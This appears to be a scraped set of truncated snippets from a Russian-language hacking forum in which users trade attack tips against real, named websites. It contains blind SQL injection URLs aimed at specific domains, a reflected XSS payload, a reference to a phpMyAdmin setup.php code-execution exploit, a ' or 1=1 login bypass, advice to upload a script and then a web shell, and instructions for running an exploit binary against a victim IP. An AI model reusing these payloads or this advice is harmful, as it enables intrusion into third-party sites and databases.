Separate names with a comma.
Ограничение наколичество выводимых символов по ходу: group_concat_max_len
На атакуймом сайте на setup.php стоит басик авторизация?
basic авторизация на пма стоит?
Это сплоит на исполнение php кода # $pma_setup_url = 'http://site.com/phpMyAdmin/scripts/setup.php'; /*полный адрес скрипта установки...
xss dnbstep.org/search?q="><script>alert()</script> путь dnbstep.org/search?q[]=11 Тестовый акк надо давать сразу,без напоминаний...
gay.ks.ua/links.php?catid=32+and+substring(@@version,1,2)=4.0
залить скрипт аплоада и через него лить уже обычный шелл ЗЫ:Не трезв...
http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10'+and+substring(version(),1,1)=5--+ version():...
Просто Джокестр,не смотрел код, там в индексе if(isset($_REQUEST['view'])) { $GLOBALS['applet'] = $_REQUEST['view']; } else {...
Возможен auth bypass,не фильтруються переменные логина и пароля.... Я не смотрел,но может поможет в дальнейшем. ЗЫ:login - ' or 1=1/*...
Попробуй # в urlencode
Под кавычкой имееться в виду "<" ? Че-то не особо понятно :) зы:Моно попробовать iframe strip_tags() мб...
В cmd выдает: usage 1.exe <target_ip> Ну запусти сплойт с параметром "<target_ip>" - это ip адрес жертвы example:1.exe 192.168.0.1 Зы:Самого...
маф туц Возможно скрипт работает с другой БД.Укажите в запросе имя БД...
